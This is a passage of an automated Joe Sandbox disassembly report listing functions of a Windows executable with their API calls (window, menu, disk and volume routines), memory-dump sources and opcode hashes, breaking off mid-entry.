                                                                                              Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID: SysTreeView32
                                                                                              • API String ID: 847901565-1698111956
                                                                                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                              Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window
                                                                                              • String ID: SysMonthCal32
                                                                                              • API String ID: 2326795674-1439706946
                                                                                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                              Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 3375834691-2298589950
                                                                                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                              Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: $<
                                                                                              • API String ID: 4104443479-428540627
                                                                                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                              Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID: \VH
                                                                                              • API String ID: 1682464887-234962358
                                                                                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                              Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID: \VH
                                                                                              • API String ID: 1682464887-234962358
                                                                                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                              Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID: \VH
                                                                                              • API String ID: 1682464887-234962358
                                                                                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                              Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                              • String ID: \VH
                                                                                              • API String ID: 2507767853-234962358
                                                                                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                              Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                              • String ID: \VH
                                                                                              • API String ID: 2507767853-234962358
                                                                                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                              Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                              Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                              • String ID: crts
                                                                                              • API String ID: 943502515-3724388283
                                                                                              • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                              • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                              • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                              • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                              Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$LabelVolume
                                                                                              • String ID: \VH
                                                                                              • API String ID: 2006950084-234962358
                                                                                              • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                              • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                              • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                              • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                              Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                              • DrawMenuBar.USER32 ref: 00449761
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$InfoItem$Draw_malloc
                                                                                              • String ID: 0
                                                                                              • API String ID: 772068139-4108050209
                                                                                              • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                              • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                              • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                              • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                              Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcscpy
                                                                                              • String ID: 3, 3, 8, 1
                                                                                              • API String ID: 3469035223-357260408
                                                                                              • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                              • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                              • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                              • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                              Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                              Strings
                                                                                              Memory Dump Source
